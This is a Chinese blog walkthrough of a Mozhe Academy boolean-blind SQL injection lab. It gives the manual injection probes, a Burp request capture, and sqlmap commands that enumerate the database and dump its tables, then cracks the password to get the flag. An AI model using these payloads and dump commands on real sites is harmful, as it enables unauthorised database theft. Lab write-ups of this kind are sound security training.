墨者学院——SQL注入漏洞测试(布尔盲注)

本次靶场操作步骤来源于 CSDN-吃肉唐僧

本次靶场使用windows系统和kali Linux系统

1.点击页面进去,发现浮动的通告进度条,找到SQL注入点

 

 2.在地址栏中输入:/new_list.php?id=1' and 1=1    ,这样页面就变成空白的了

 3.输入/new_list.php?id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型

 4.然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10

首先这里确定了这个数据库的长度(10)和类型(数字型),接下来就用bp抓网页内容

5.在kali终端新建一个后缀名为.txt的文件,然后打开bp,将在网页上打开的通知网页的URL复制在bp上进行抓包,将下面的内容复制并保存在.txt文件里面

 这里主要说一下就是,我们访问的是静态网页,所以每次抓到的都是一样的内容,如果说设置的浏览器(我这里的浏览器是chrome)不一样,你可以对比一下我抓到的内容有没有什么不一样

 6.回到kali终端,输入查找数据库的命令:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 --dbs --dbms mysql --batch

 7.接着向下,找数据库里面的数据表:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 --tables --batch

 8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch

 9.最后看字段值: sqlmap -r *.txt(新建的文本文件)  --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch

 最后的最后将密码解密一下,然后回到登录网页,就能看到Key,然后提交

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值